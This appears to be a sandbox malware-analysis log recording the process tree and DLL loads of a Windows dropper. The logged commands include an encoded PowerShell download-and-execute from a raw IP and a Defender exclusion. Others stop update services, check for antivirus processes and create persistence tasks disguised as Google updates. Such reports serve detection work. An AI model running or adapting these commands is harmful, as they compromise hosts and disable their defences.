            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
            Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 287175Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "COALITIONFIBERRELPASTE" Gays Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Yoga + Sail 287175\BJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif Surrey.pif BJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe "C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\Update.exe "C:\Users\user\AppData\Local\Temp\Update.exe"
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe "C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe"
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
